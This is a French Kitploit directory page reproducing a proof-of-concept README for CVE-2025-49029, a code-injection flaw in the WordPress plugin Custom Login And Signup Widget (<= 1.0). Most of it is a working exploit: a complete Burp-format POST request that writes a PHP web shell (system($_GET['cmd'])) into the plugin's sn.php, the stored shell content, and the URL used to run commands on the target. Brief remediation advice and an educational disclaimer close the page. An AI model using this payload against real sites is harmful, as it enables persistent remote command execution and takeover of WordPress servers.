Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49029 — Le plugin WordPress Custom Login And Signup Widget <= 1.0 est vulnérable à l'exécution de code arbitraire. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-49029
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-49029

CVE-2025-49029

Le plugin WordPress Custom Login And Signup Widget <= 1.0 est vulnérable à l'exécution de code arbitraire.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Plugin WordPress Custom Login And Signup Widget <= 1.0 - Exécution de code arbitraire (RCE)

🐞 Résumé de la vulnérabilité

La vulnérabilité Contrôle inadéquat de la génération de code (« Injection de code ») dans bitto.Kazi Custom Login And Signup Widget permet l’exécution de code PHP arbitraire par des administrateurs authentifiés.
Ce problème affecte toutes les versions jusqu’à la version 1.0 incluse.

🔥 Score de base : 9.1 (CRITIQUE)
ID CWE : CWE-94 – Contrôle inadéquat de la génération de code (« Injection de code »)


🧠 Description

Le plugin permet aux administrateurs de modifier le contenu de sn.php via le champ Nom de l’expéditeur de la page de réglages.
L’entrée fournie par l’utilisateur est écrite directement dans un fichier PHP sans assainissement ni validation.

Par conséquent, tout code PHP fourni dans le paramètre text sera stocké dans un fichier PHP puis exécuté lors d’une requête directe, ce qui permet une .

exécution de code à distance (RCE)

📍 Endpoint vulnérable

root@kitploit:~
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 Requête (format Burp Suite)

root@kitploit:~
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 Point d’injection

  • Paramètre : text
  • Type : POST
  • Rôle requis : Administrateur
  • Fichier concerné : sn.php (inclusion de configuration du plugin)

🧬 Contenu injecté stocké dans le fichier

root@kitploit:~
<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 Fichier écrit dans :

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

Après une injection réussie, accédez-y directement pour exécuter des commandes via :

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ Recommandations

  • Limitez les opérations d’écriture de fichiers.
  • Assainissez et validez toutes les entrées avant de les écrire dans des fichiers PHP.
  • N’autorisez jamais l’écriture de contenu dynamique dans des fichiers .php.

⚠️ Avertissement

Ce projet est créé uniquement à des fins éducatives et de recherche.
Toute utilisation des informations fournies se fait à vos propres risques.
L’auteur décline toute responsabilité en cas d’utilisation abusive ou de dommages causés par ce contenu.


✍️ Par : Khaled_Alenazi (Nxploited)

Télécharger l’outil